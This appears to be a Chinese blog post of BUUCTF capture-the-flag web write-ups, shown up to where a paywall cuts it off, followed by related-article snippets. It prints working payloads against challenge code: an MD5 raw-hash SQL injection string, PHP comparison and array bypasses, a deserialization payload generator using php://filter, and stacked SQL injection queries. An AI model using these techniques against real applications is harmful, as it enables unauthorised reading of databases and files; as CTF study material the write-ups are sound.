buuctf刷题

最新推荐文章于 2025-05-24 11:32:59 发布
原创 最新推荐文章于 2025-05-24 11:32:59 发布 · 2.1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了多个CTF挑战的解题过程,涉及Web安全的多个方面,包括SQL注入、弱口令、模板注入、变量覆盖、PHP伪协议等。通过这些案例,展示了如何利用漏洞执行系统命令、读取敏感信息和获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

buuctf刷题

BJDCTF2020 Easy MD5

进来就是一个输入框,发包查看返回信息
在这里插入图片描述
可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用
select * from ‘admin’ where password=’‘or’1’

这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

找到ffifdyop字符串,输入后出现
在这里插入图片描述
查看HTML源码发现部分PHP源码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

弱相等,使用a=QNKCDZO&b=s214587387a 可以到达下一关
下一关也给了源码,不过这次是强相等

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

根据PHP的一些特性,可以知道MD5函数处理数组会返回null,所以param1[]=1&param2[]=2 可以拿到flag。

md5(array()) = null
sha1(array()) = null    
ereg(pattern,array()) = null vs preg_match(pattern,array) = false
strcmp(array(), "abc") = null
strpos(array(),"abc") = null

网鼎杯 2020 青龙组 AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}
  1. 首先对传进来的str判断里面的字符必须在ascii码32~125之间。
  2. 然后反序列化执行到析构函数__desctruct();判断op,如果为2的话会重新赋值为1。
  3. 在process()函数中op为1调用write()函数。2调用read()函数。所以我们需要的就是调用read()函数。所以不能让析构函数对op重新赋值。
  4. 我们可以看到析构函数中对op的判断是强相等,因为上面判断的是字符串,所以我们只要将op定义为整形就可以绕过。
  5. 生成payload代码如下。
<?php
 
class FileHandler {
 
    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
 
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        // $this->process();
    }
 
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
 
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
 
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
 
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
 
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        // $this->process();
    }
 
}
$A=new FileHandler();
$B=serialize($A);
echo $B;

GYCTF2020 Blacklist

堆叠注入 + handler

1';show databases;					\\查看数据库
1';show tables;						\\查看数据表
1';show columns from FlagHere;		\\查看数据表中的字段名
1';handler FlagHere open as p;handler p read first;handler p close;

强网杯 2019 随便注

黑名单列表
return preg_match("/select|update|delete|drop|insert|where|./i",$inject);

11';show columns from `1919810931114514`;		\\可以看到flag列在这个数字的表中

万能密码可以看到数据,结合之前的查询,判断这个是words表中的数据

最低0.47元/天 解锁文章

200万优质内容无限畅学
PHP中的MD5()函数漏洞
John_lain的博客
10-28 4017
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
BUUCTF笔记—Basic—BUU BRUTE 1
qq_43176656的博客
08-14 1115
BUUCTF
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6459
web入门——php特性web123web125web126 web123 目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
CTFshow日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3596
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
BUUCTF—CRYPTO
最新发布
shenqingyue的博客
05-24 612
解析:首先找规律,flag之间都隔了一个字母,由此可见是分两组的栅栏密码,可得答案:flag{wethinkwehavetheflag}解析:由可知,该编码为Quoted-printable编码直接上在线解码网站解码,答案是:flag{那你也很棒哦}目:=E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=88=E6=A3=92=E5=93=A6。目:.. .-.. --- ...- . -.-- --- ..-答案是:flag{THE_FLAG_OF_THIS_STRING}
ctfshow—PHP特性
cosmoslin的博客
09-14 2695
PHP特性 以ctfshow平台目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
ctf.show WEB入门-php特性系列
~airrudder~
09-21 2196
WEB入门 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 由于intval(array(.
BUUCTF XSS-Lab
weixin_54438700的博客
07-21 2090
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")
BUUCTF笔记—CODE REVIEW 1(使用Hacker google/Edge扩展器)
qq_43176656的博客
08-24 1675
BUUCTF CODE REVIEW Hacker
buuctf记录
weixin_53409153的博客
05-25 366
最近这段时间除了再写iscc外(当然,我比较菜,会做的有限,但是也还是在学习的过程中)在其他时候,也是会写一点buuctf上的的。在加上一点以前写的一部分,算下来也有20多道,现在就统一记录一下吧,后面要是在了,在往后面补充。 easyre 这道其实不用多说,拿道后,直接查壳,发现无壳,且是64位的,拖入IDA中Shift+F12就可以直接看到falg 得到flag{this_Is_a_EaSyRe} reverse1 其实大部分逆向的,在最开始的地方还是很像的,这依旧是查壳, 无壳,
[CTFSHOW]PHP特性
Huamang的博客
03-19 1859
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
CTFshow web入门——php特性
小元砸的博客
02-20 7363
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
[ctf零基础入门]php基础
小飒的博客
08-28 1319
本文难度简单,适合0基础 工具:hackbar或burp ,PHPstudy Php基本语法: https://www.w3school.com.cn/php/php_syntax.asp 先快速自学 弱类型 如果一个字符串为 “合法数字+e+合法数字”类型,将会解释为科学计数法的浮点数 如果一个字符串为 “合法数字+ 不可解释为合法数字的字符串”类型,将会被转换为该合法数字的值,后面的字符串将会被丢弃 如果一个字符串为“不可解释为合法数字的字符串+任意”类型,则被转换为0! 1 <?php 2 va
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1769
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
ctf变量覆盖漏洞
weixin_30696427的博客
08-06 339
1.变量覆盖: ①:针对extract函数的变量覆盖漏洞: 1 <?php 2 @error_reporting(E_ALL^E_NOTICE); 3 require('config.php'); 4 5 if($_GET['show_source'] === '1') { 6 highlight_file(__FILE__); 7 exi...
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 9264
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(
ctfshow—SSRF详解
cosmoslin的博客
09-24 1441
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
攻防世界 web simple_php
CN天狼
11-21 928
打开就是一串代码,完全没有其他CTF那样有趣的封面 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ exit(); } if($b>1234){ echo $flag2; } ?> 看代码: 要想得到flag1和2 要满足三个条
buuctfweb
01-17
### BUUCTF Web 类型练习 #### 网站源码备份文件泄露和PHP反序列化 在BUUCTF平台上,有一道涉及网站源码备份文件泄露和PHP反序列化的目。这类目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值